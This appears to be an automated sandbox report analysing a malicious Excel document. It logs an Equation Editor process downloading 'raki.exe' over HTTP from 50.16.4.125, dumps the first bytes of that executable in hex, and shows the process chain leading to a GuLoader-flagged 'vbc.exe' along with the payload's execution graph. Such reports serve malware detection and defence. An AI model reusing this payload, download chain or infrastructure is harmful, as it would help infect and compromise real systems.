                                              Jan 26, 2022 10:40:54.122174025 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.122184038 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.122191906 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.122210026 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.122210979 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.122226000 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.122226954 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.122242928 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.122245073 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.122256041 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.122262955 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.122270107 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.122279882 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.122294903 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.122298002 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.122308969 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.122315884 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.122324944 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.122334957 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.122349977 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.122351885 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.122364998 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.122370005 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.122380972 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.122389078 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.122406006 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.122407913 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.122420073 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.122426987 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.122440100 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.122443914 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.122454882 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.122473001 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.124610901 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.125274897 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.125293016 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.125320911 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.125339031 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.130644083 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.261042118 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.261065960 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.261079073 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.261096001 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.261112928 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.261130095 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.261147022 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.261163950 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.261250973 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.261276960 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.261291981 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.261296034 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.261296988 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.261308908 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.261316061 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.261318922 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.261334896 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.261352062 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.261356115 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.261367083 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.261368990 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.261382103 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.261387110 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.261398077 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.261404991 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.261413097 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.261421919 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.261436939 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.261440039 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.261450052 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.261461020 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.261473894 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.261477947 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.261495113 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.261496067 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.261506081 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.261522055 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.261964083 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.261982918 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.261995077 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.262023926 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.262046099 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.262641907 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.262664080 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.262680054 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.262697935 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.262702942 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.262713909 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.262718916 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.262732029 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.262732983 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.262748003 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.262752056 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.262763977 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.262769938 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.262784958 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.262789011 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.262800932 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.262808084 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.262814999 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.262825966 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.262844086 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.262842894 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.262856007 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.262865067 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.262881994 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.262881994 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.262897968 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.262903929 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.262909889 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.262923002 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.262934923 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.262940884 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.262958050 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.262958050 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.262969971 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.262975931 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.262984991 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.262995005 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.263011932 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.263011932 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.263022900 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.263046980 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.264146090 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.266905069 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.266994953 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.268719912 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.268740892 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.268810034 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.273080111 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.400101900 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.400145054 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.400161028 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.400186062 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.400209904 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.400230885 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.400253057 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.400291920 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.400337934 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.402221918 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.402245045 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.402262926 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.402286053 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.402297974 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.402307987 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.402328968 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.402332067 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.402333021 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.402348995 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.402354956 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.402359009 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.402378082 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.402388096 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.402400970 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.402414083 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.402425051 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.402426004 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.402448893 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.402457952 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.402472019 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.402481079 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.402492046 CET804916750.16.4.125192.168.2.22
                                              Jan 26, 2022 10:40:54.402501106 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.402524948 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:54.403177977 CET4916780192.168.2.2250.16.4.125
                                              Jan 26, 2022 10:40:55.328361988 CET4916780192.168.2.2250.16.4.125
                                              • 50.16.4.125
                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.224916750.16.4.12580C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              TimestampkBytes transferredDirectionData
                                              Jan 26, 2022 10:40:53.567604065 CET0OUTGET /E/raki.exe HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Host: 50.16.4.125
                                              Connection: Keep-Alive
                                              Jan 26, 2022 10:40:53.706120968 CET1INHTTP/1.1 200 OK
                                              Date: Wed, 26 Jan 2022 09:40:54 GMT
                                              Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.0.14
                                              Last-Modified: Wed, 26 Jan 2022 04:12:20 GMT
                                              ETag: "29888-5d6746870006c"
                                              Accept-Ranges: bytes
                                              Content-Length: 170120
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: application/x-msdownload
                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5a 9b 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 6a 00 00 00 da 02 00 00 08 00 00 2d 35 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 a0 05 00 00 04 00 00 7c 04 03 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 86 00 00 a0 00 00 00 00 c0 04 00 c8 d5 00 00 00 00 00 00 00 00 00 00 f0 83 02 00 98 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 97 68 00 00 00 10 00 00 00 6a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a6 14 00 00 00 80 00 00 00 16 00 00 00 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 b0 02 00 00 a0 00 00 00 06 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 60 01 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 c8 d5 00 00 00 c0 04 00 00 d6 00 00 00 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1PfPfPf*_9PfPgLPf*_;PfsVPf.V`PfRichPfPELZOaj-5@|@.texthj `.rdatan@@.data@.ndata``.rsrc@@
                                              Jan 26, 2022 10:40:53.706151962 CET3INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b 83 7d 0c 46 8b 45 14 75 0d 83 48 18 10 8b 0d 08 4f 43 00 89 48 04 50 ff 75 10 ff 75 0c ff 75 08 ff 15 84 82 40 00 e9 42 01 00 00 53 56 8b 35 10 4f 43 00 8d 45 a4
                                              Data Ascii: U\}t+}FEuHOCHPuuu@BSV5OCEWPu@eEEPu@}e`@FRVVU+MM3FQNUMVTUFPEEPM\@EEPEPu
                                              Jan 26, 2022 10:40:53.706163883 CET4INData Raw: 43 00 e9 f9 16 00 00 8b 88 e0 4f 43 00 89 88 80 4f 43 00 e9 e8 16 00 00 8b 45 d8 8d 34 85 80 4f 43 00 33 c0 8b 0e 3b cb 0f 94 c0 23 4d dc 8b 44 85 d0 89 0e e9 d2 16 00 00 8b 45 d4 ff 34 85 80 4f 43 00 57 e9 31 16 00 00 8b 0d d0 3e 43 00 8b 35 50
                                              Data Ascii: COCOCE4OC3;#MDE4OCW1>C5P@;tuQE>C;PQjuP@nmjPEH;tZj\VZHf>ff;u9]tEtulDuD;t=uu
                                              Jan 26, 2022 10:40:53.706176996 CET5INData Raw: 89 1f 66 89 9f fe 07 00 00 e9 b8 11 00 00 8b 75 e4 53 e8 09 13 00 00 6a 01 8b f8 89 55 f0 e8 fd 12 00 00 59 3b f3 59 89 55 f0 75 08 3b f8 7c 08 7e 8a eb 12 3b f8 73 08 8b 45 dc e9 91 11 00 00 0f 86 76 ff ff ff 8b 45 e0 e9 83 11 00 00 6a 01 e8 cb
                                              Data Ascii: fuSjUY;YUu;|~;sEvEjjUuYUYE$L-@_+X;tSC#323;;u3;t;t3F;t3E
                                              Jan 26, 2022 10:40:53.844465971 CET7INData Raw: 00 ff 75 ac eb 47 53 e8 fc 0d 00 00 8b f0 56 6a eb e8 eb 35 00 00 56 e8 66 3b 00 00 8b f0 3b f3 0f 84 6a 09 00 00 39 5d d8 74 21 56 e8 e6 49 00 00 39 5d d4 7c 0b 50 ff 75 f4 e8 a7 44 00 00 eb 0b 3b c3 74 07 c7 45 fc 01 00 00 00 56 ff 15 24 81 40
                                              Data Ascii: uGSVj5Vf;;j9]t!VI9]|PuD;tEV$@4jPpH;tvupDvQEffjuMEQPjHEf;fEVj@8@;EjHjEHuEVSuU
                                              Jan 26, 2022 10:40:53.844506025 CET8INData Raw: 00 00 8d 44 00 02 83 fe 04 75 12 6a 03 e8 9a 08 00 00 59 a3 f0 b5 40 00 56 89 55 c8 58 83 fe 03 75 0f 68 00 18 00 00 57 53 ff 75 dc e8 ab 0d 00 00 50 57 ff 75 f0 53 ff 75 bc ff 75 08 ff 15 0c 80 40 00 85 c0 75 03 89 5d fc ff 75 08 e9 d3 00 00 00
                                              Data Ascii: DujY@VUXuhWSuPWuSuu@u]uhj3i;fMEQMWQSPV@3Au.}t9Mt}uEEt739]WE>ffM^h>j;YUfn9]M
                                              Jan 26, 2022 10:40:53.844528913 CET10INData Raw: 08 e8 c7 36 00 00 57 ff 15 34 81 40 00 83 4d c8 ff 53 53 ff 75 08 ff 75 c8 e8 84 08 00 00 ff 75 08 8b f8 ff 15 24 81 40 00 6a f3 3b fb 5e 7d 13 6a ef 5e ff 75 c0 ff 15 70 81 40 00 c7 45 fc 01 00 00 00 56 e9 96 f8 ff ff 53 e8 23 03 00 00 8b f8 59
                                              Data Ascii: 6W4@MSSuuu$@j;^}j^up@EVS#Y;=,OCUEi5(OC;|uVu:Q+MtjYUEuFP:NEM9]JW?S YU09]t"9]
                                              Jan 26, 2022 10:40:53.844552040 CET11INData Raw: c0 74 d0 ff 75 fc ff 15 10 80 40 00 6a 03 e8 ab 39 00 00 85 c0 75 1e ff 75 0c ff 75 08 ff 15 18 80 40 00 eb 1b ff 75 fc ff 15 10 80 40 00 b8 eb 03 00 00 eb 0b 6a 00 56 ff 75 0c ff 75 08 ff d0 5f 5e 5b c9 c2 0c 00 55 8b ec 81 ec 80 00 00 00 81 7d
                                              Data Ascii: tu@j9uuu@u@jVuu_^[U}ujhju@@E}uLA$B;rPjdQ@PEh@PT@EPuD@EPhuh+3V39t$t B;tP8@5 B^95 B
                                              Jan 26, 2022 10:40:53.844574928 CET12INData Raw: 45 00 00 00 85 c0 74 2f 56 57 ff 75 0c e8 47 2c 00 00 85 c0 74 c8 01 75 fc 29 75 14 83 7d 14 00 7f cc eb 1b 39 75 14 7d 03 8b 75 14 56 57 e8 16 00 00 00 85 c0 75 05 6a fd 58 eb 06 89 75 fc 8b 45 fc 5f 5e 5b c9 c2 10 00 ff 74 24 08 ff 74 24 08 ff
                                              Data Ascii: Et/VWuG,tu)u}9u}uVWujXuE_^[t$t$5@+jjt$5@`@V(DV2Vu)u^V(V%Vh D1+^USVWj _3h]E@]@5@P]]
                                              Jan 26, 2022 10:40:53.844598055 CET14INData Raw: e8 78 2b 00 00 0f b7 05 5a a2 40 00 0f b7 0d 58 a2 40 00 c1 e0 10 0b c1 c7 45 f8 1a 00 00 00 a3 00 68 43 00 bf 28 aa 42 00 a1 10 4f 43 00 ff b0 20 01 00 00 57 e8 80 2b 00 00 57 ff 15 70 81 40 00 39 5d fc 74 3e 6a 01 57 68 00 38 44 00 ff 15 e4 80
                                              Data Ascii: x+Z@X@EhC(BOC W+Wp@9]t>jWh8D@t,SW(OC$WJ+W ;tP$@]fhCMuSV(3@9]th u'!j@9OCtvEPj(@P$@t/EPh0@S @SSES
                                              Jan 26, 2022 10:40:53.844620943 CET15INData Raw: 8b 29 66 33 e8 23 eb 66 85 ed 74 06 85 f6 75 ec eb 19 8b 51 02 89 15 e0 3e 43 00 8b 51 06 89 15 a8 4f 43 00 8d 51 0a 85 d2 75 12 66 81 fb ff ff 75 07 bb ff 03 00 00 eb a3 33 db eb 9f 89 15 dc 3e 43 00 0f b7 01 50 57 e8 3d 25 00 00 e8 2f 00 00 00
                                              Data Ascii: )f3#ftuQ>CQOCQufu3>CPW=%/,OC5(OCttPFP&Ou_^][V?CjV%V5HBD@^SUVt$$;WaU|$$3GujUUUUW5HB@\$,uBH


                                              Click to jump to process

                                              Click to jump to process

                                              Click to dive into process behavior distribution

                                              Click to jump to process

                                              Target ID:0
                                              Start time:10:40:20
                                              Start date:26/01/2022
                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                              Imagebase:0x13f3d0000
                                              File size:28253536 bytes
                                              MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Target ID:2
                                              Start time:10:40:43
                                              Start date:26/01/2022
                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                              Imagebase:0x400000
                                              File size:543304 bytes
                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Target ID:4
                                              Start time:10:40:45
                                              Start date:26/01/2022
                                              Path:C:\Users\Public\vbc.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\Public\vbc.exe"
                                              Imagebase:0x400000
                                              File size:170120 bytes
                                              MD5 hash:0DCB37FF90B93B7A3225707B1AF111B8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.680919956.0000000003790000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:17.1%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:16.2%
                                                Total number of Nodes:1573
                                                Total number of Limit Nodes:28
                                                execution_graph 3933 401941 3934 401943 3933->3934 3939 402da6 3934->3939 3940 402db2 3939->3940 3985 40657a 3940->3985 3943 401948 3945 405c49 3943->3945 4027 405f14 3945->4027 3948 405c71 DeleteFileW 3950 401951 3948->3950 3949 405c88 3951 405db3 3949->3951 4041 40653d lstrcpynW 3949->4041 3951->3950 4070 406873 FindFirstFileW 3951->4070 3953 405cae 3954 405cc1 3953->3954 3955 405cb4 lstrcatW 3953->3955 4042 405e58 lstrlenW 3954->4042 3957 405cc7 3955->3957 3960 405cd7 lstrcatW 3957->3960 3961 405ccd 3957->3961 3962 405ce2 lstrlenW FindFirstFileW 3960->3962 3961->3960 3961->3962 3966 405da8 3962->3966 3983 405d04 3962->3983 3963 405dd1 4073 405e0c lstrlenW CharPrevW 3963->4073 3966->3951 3967 405d8b FindNextFileW 3971 405da1 FindClose 3967->3971 3967->3983 3968 405c01 5 API calls 3970 405de3 3968->3970 3972 405de7 3970->3972 3973 405dfd 3970->3973 3971->3966 3972->3950 3976 40559f 24 API calls 3972->3976 3975 40559f 24 API calls 3973->3975 3975->3950 3978 405df4 3976->3978 3977 405c49 60 API calls 3977->3983 3980 4062fd 36 API calls 3978->3980 3979 40559f 24 API calls 3979->3967 3982 405dfb 3980->3982 3982->3950 3983->3967 3983->3977 3983->3979 4046 40653d lstrcpynW 3983->4046 4047 405c01 3983->4047 4055 40559f 3983->4055 4066 4062fd MoveFileExW 3983->4066 3987 406587 3985->3987 3986 4067aa 3988 402dd3 3986->3988 4018 40653d lstrcpynW 3986->4018 3987->3986 3990 406778 lstrlenW 3987->3990 3992 40657a 10 API calls 3987->3992 3993 40668f GetSystemDirectoryW 3987->3993 3996 4066a2 GetWindowsDirectoryW 3987->3996 3997 406719 lstrcatW 3987->3997 3998 40657a 10 API calls 3987->3998 3999 4067c4 5 API calls 3987->3999 4000 4066d1 SHGetSpecialFolderLocation 3987->4000 4011 40640b 3987->4011 4016 406484 wsprintfW 3987->4016 4017 40653d lstrcpynW 3987->4017 3988->3943 4002 4067c4 